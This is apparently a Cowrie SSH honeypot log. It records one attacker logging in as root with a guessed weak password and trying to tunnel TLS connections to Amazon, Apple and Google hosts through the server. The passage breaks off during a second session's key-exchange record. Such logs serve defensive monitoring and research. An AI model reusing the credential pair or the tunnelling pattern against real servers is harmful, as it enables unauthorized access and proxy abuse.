{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38938,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc7fca97a85c","protocol":"ssh","message":"New connection: 212.227.235.229:38938 (1.2.3.4:22) [session: fc7fca97a85c]","sensor":"my-vps","timestamp":"2025-08-31T01:27:45.998423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T01:27:45.999524Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T01:27:46.098440Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:27:46.598776Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.171.12.40","dst_port":443,"src_ip":"212.227.235.229","src_port":43924,"message":"direct-tcp connection request to 54.171.12.40:443 from 127.0.0.1:43924","sensor":"my-vps","timestamp":"2025-08-31T01:27:48.104318Z","session":"fc7fca97a85c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.171.12.40","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xfd\\xdf\\xc9+\\xf9\\xe7\\xadV\\x8a\\xa6\\xa3\\xa5\\xe3d\\xf6\\xbf\\x1d]\\x8d\\xa2\\xe7\\x149k\\xf2]\\xaa)*D\\xb0\\xb9 Q\\xb9\\xd9\\x19\\xbf\\x13\\x7fz\\xa1s\\x9ft\\xbe\\xc62\\xa4\\x04\\xe5\\xd6\\x9b\\x0b/-\\x1b\\xef\"\\x1c\\xc3x=\\x9e\\xb0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 Yx\\xca\\xa0Sh\\x86w5\\x19~\\x1d\\x1bs\\xfc\\x85\\xec\\'\\xb99G\\xf6o\\x7foZ\\xf4JR+\\xd2`\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":0,"message":"discarded direct-tcp forward request 0 to 54.171.12.40:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xfd\\xdf\\xc9+\\xf9\\xe7\\xadV\\x8a\\xa6\\xa3\\xa5\\xe3d\\xf6\\xbf\\x1d]\\x8d\\xa2\\xe7\\x149k\\xf2]\\xaa)*D\\xb0\\xb9 Q\\xb9\\xd9\\x19\\xbf\\x13\\x7fz\\xa1s\\x9ft\\xbe\\xc62\\xa4\\x04\\xe5\\xd6\\x9b\\x0b/-\\x1b\\xef\"\\x1c\\xc3x=\\x9e\\xb0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 Yx\\xca\\xa0Sh\\x86w5\\x19~\\x1d\\x1bs\\xfc\\x85\\xec\\'\\xb99G\\xf6o\\x7foZ\\xf4JR+\\xd2`\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T01:27:48.382761Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.112.242","dst_port":443,"src_ip":"212.227.235.229","src_port":44462,"message":"direct-tcp connection request to 23.53.112.242:443 from 127.0.0.1:44462","sensor":"my-vps","timestamp":"2025-08-31T01:27:49.126796Z","session":"fc7fca97a85c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.112.242","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc0\\x9e\\xa4pA\\xab\\x00\\xc5g\\x19\\xd4\\xef{trx\\x16\\x16\\x89\\xbbI\\x866\\xeb\\xae\\xc0\\xc9\\xdcYP0\\xc6 \\xbbbE;\\xa8\\x14^\\xe6g\\x86\\x03sy\"\\xfe\\xc8\\xa6\\xf2\\xa5\\x1bW5\\x80l\\xb1\\xeb\\x05oc!]\\'\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9b\\xa5\\xe4\\xe7\\xe8\\x14b/\\x069\\nWv\\x9a\\xf5)\\xe1\\x9f\\xb6\\xaf\\x00\\x94t\\xf1,\\t\\xf6\\xb8\\x07l\\xbfc\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.112.242:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xc0\\x9e\\xa4pA\\xab\\x00\\xc5g\\x19\\xd4\\xef{trx\\x16\\x16\\x89\\xbbI\\x866\\xeb\\xae\\xc0\\xc9\\xdcYP0\\xc6 \\xbbbE;\\xa8\\x14^\\xe6g\\x86\\x03sy\"\\xfe\\xc8\\xa6\\xf2\\xa5\\x1bW5\\x80l\\xb1\\xeb\\x05oc!]\\'\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9b\\xa5\\xe4\\xe7\\xe8\\x14b/\\x069\\nWv\\x9a\\xf5)\\xe1\\x9f\\xb6\\xaf\\x00\\x94t\\xf1,\\t\\xf6\\xb8\\x07l\\xbfc\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T01:27:49.300667Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.36","dst_port":443,"src_ip":"212.227.235.229","src_port":44938,"message":"direct-tcp connection request to 142.251.36.36:443 from 127.0.0.1:44938","sensor":"my-vps","timestamp":"2025-08-31T01:27:49.402691Z","session":"fc7fca97a85c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x16\\xbc\\xe4\\xa7\\xc7C\\xcb\\xfb\\xaf\\x97\\x89\\xc8\\xeb%\\x0cI\\xde\\xb9\\xfa\\xdf&\\xa2\\xaf\\xf8\\x9a\\xe0\\x9c\\xa69\\x87)\\x92 O\\xe6bJ,\\xb0[\\x84P\\x14:\\x06J\\xb7F\\x97\\x91\\xea\\x147\\x94\\xeam\\xcfGK\\x99\\xac\\x1f\\xd9\\xf6\\x08\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x11\\x95\\x88z\\x18\\x9f\\xca\\r\\xad\\xe55\\xb0.\\x8c\\xab\\x15\\xe2\\x8e\\np\\x85\\x04\\x8cQ\\x7f\\n\\xf5\\x88\\xea]\\xbcz\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x16\\xbc\\xe4\\xa7\\xc7C\\xcb\\xfb\\xaf\\x97\\x89\\xc8\\xeb%\\x0cI\\xde\\xb9\\xfa\\xdf&\\xa2\\xaf\\xf8\\x9a\\xe0\\x9c\\xa69\\x87)\\x92 O\\xe6bJ,\\xb0[\\x84P\\x14:\\x06J\\xb7F\\x97\\x91\\xea\\x147\\x94\\xeam\\xcfGK\\x99\\xac\\x1f\\xd9\\xf6\\x08\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x11\\x95\\x88z\\x18\\x9f\\xca\\r\\xad\\xe55\\xb0.\\x8c\\xab\\x15\\xe2\\x8e\\np\\x85\\x04\\x8cQ\\x7f\\n\\xf5\\x88\\xea]\\xbcz\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T01:27:49.516034Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:49.616541Z","src_ip":"212.227.235.229","session":"fc7fca97a85c"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.18","src_port":2124,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddb31b794520","protocol":"ssh","message":"New connection: 194.0.234.18:2124 (1.2.3.4:22) [session: ddb31b794520]","sensor":"my-vps","timestamp":"2025-08-31T01:27:55.020136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.8.1_DEV","message":"Remote SSH version: SSH-2.0-libssh2_1.8.1_DEV","sensor":"my-vps","timestamp":"2025-08-31T01:27:55.023677Z","src_ip":"194.0.234.18","session":"ddb31b794520"}
{"eventid":"cowrie.client.kex","hassh":"2311efe7204dfc3007bb4ce758ac6a98","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc,none;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com,none;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-c